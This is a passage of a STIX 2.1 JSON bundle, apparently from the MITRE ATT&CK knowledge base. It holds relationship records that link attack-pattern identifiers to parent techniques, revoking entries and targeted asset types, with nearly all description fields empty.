["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a2dc6f64-0980-4668-957d-a09538074898", "created": "2020-10-02T17:08:57.537Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a2f0b9ba-2d6e-43a5-adca-3ec42dba5ce9", "created": "2023-09-29T16:36:28.818Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:36:28.818Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a31e4c9c-c69d-445e-a669-0b0f6bdaff3e", "created": "2020-01-31T12:32:08.432Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a31ed7a5-8ed3-46e7-8e3b-32935023e19b", "created": "2022-09-30T21:18:42.043Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-09-30T21:18:42.043Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a33048dc-d843-497c-b8e0-048cc3a08ac7", "created": "2020-03-19T20:31:11.677Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3839408-eef4-4099-89c0-fc52ac55e650", "created": "2020-01-17T16:51:52.291Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", "target_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3f258ea-6d4d-4b0e-8ff2-b91f49dfd4d7", "created": "2023-09-29T16:39:54.248Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:39:54.248Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a45cec05-2d81-4db1-9267-db8be498e0d2", "created": "2023-09-29T16:46:50.699Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:46:50.699Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a466d5b4-39f0-48c1-9a19-f006dc4cb0ac", "created": "2023-09-29T17:40:58.726Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:40:58.726Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a468fd3d-b1a8-4d1f-b19b-8073a80a0041", "created": "2020-10-20T00:06:56.288Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a46f722e-4399-4aa6-b0a9-61fae9d0bf63", "created": "2023-09-29T17:57:44.978Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:57:44.978Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a4c64fbc-bac4-44b8-ba52-8fcfa3f674e5", "created": "2023-09-29T17:40:08.922Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:40:08.922Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6270b8b-89b1-484f-9da9-a1111c74ad11", "created": "2020-02-11T19:01:16.032Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6baf58a-f679-4ba7-abfd-4e1e67ad407b", "created": "2020-02-21T21:08:26.597Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6e77d6e-a76d-446c-a8ac-03b48892b7cb", "created": "2020-02-20T22:06:41.878Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6e9bbe1-3e59-45c0-987a-b5354d602dc7", "created": "2023-09-29T17:05:56.185Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:05:56.185Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6f0c9d2-ae40-4dee-9231-4f6fa3d87b00", "created": "2020-03-13T13:51:58.704Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a72c212f-6d4f-4c5d-873d-afa42021024c", "created": "2024-03-26T15:42:10.203Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-26T15:42:10.203Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a72f9e78-41af-40c7-bce3-9e1e21d956e2", "created": "2020-01-24T14:47:41.988Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a7a2790e-d5ba-4a46-bde3-c698c6ae52ac", "created": "2023-09-28T19:41:16.927Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:41:16.927Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a84dd2f5-d4f4-44c1-ba51-4804f40576e1", "created": "2023-09-28T20:28:27.970Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:28:27.970Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a8689b2d-917b-432d-97ea-7b06a2da0bee", "created": "2020-02-11T18:30:21.127Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39", "target_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a86e40b2-0ee0-4f70-b32f-80b1bcde9948", "created": "2022-08-30T14:17:01.017Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-08-30T14:17:01.017Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a91295dc-b381-4dc9-9384-9f9949066778", "created": "2023-09-29T18:42:18.446Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:42:18.446Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a93ba793-24dd-47dd-b32c-4c3016124c90", "created": "2023-09-29T18:43:02.969Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:43:02.969Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a9ad8c47-9cec-45c1-8d07-6154d2cc752b", "created": "2020-02-11T18:46:24.525Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa7a0f45-e027-4d79-8413-5d807f44c1ba", "created": "2023-09-29T17:42:56.284Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:42:56.284Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab280771-fa9b-4874-8248-343f7b66f85a", "created": "2024-05-22T17:22:51.763Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:00:42.223Z", "description": "Asset Mapping Rationale: ", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab5c9a38-3140-43b6-bcf4-6197a116cd0b", "created": "2023-09-29T17:37:50.048Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:37:50.048Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab844cd2-0f56-44f9-9838-cd5f04d75f3e", "created": "2023-09-29T17:37:16.719Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:37:16.719Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab8bf0a3-0eef-4364-a3f9-f6ab6222afed", "created": "2023-09-28T19:41:30.623Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:41:30.623Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aba6e5b5-7fa2-4dab-af55-7cc4f20e0105", "created": "2024-05-23T03:51:34.219Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:02:17.826Z", "description": "Asset Mapping Rationale: Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aba9d812-3839-42c8-9759-be934c1e54a4", "created": "2020-01-13T15:52:59.231Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ac53cb36-9471-4ea0-8316-42d97f84956f", "created": "2020-01-30T14:40:20.626Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ac63d227-ff8a-43b8-81ef-ec4c046c4291", "created": "2023-10-02T20:20:19.426Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:20:19.426Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ac933d76-8207-4bf7-add2-92b60cf3044b", "created": "2023-09-28T20:04:54.213Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:04:54.213Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ad87ebba-c4fc-458a-8ccd-c1cbd16ae14d", "created": "2022-09-28T13:29:53.437Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-09-28T13:29:53.437Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--adb41ca8-7d2a-4025-b673-db44c9e1f16b", "created": "2023-09-28T21:12:39.257Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:12:39.257Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": 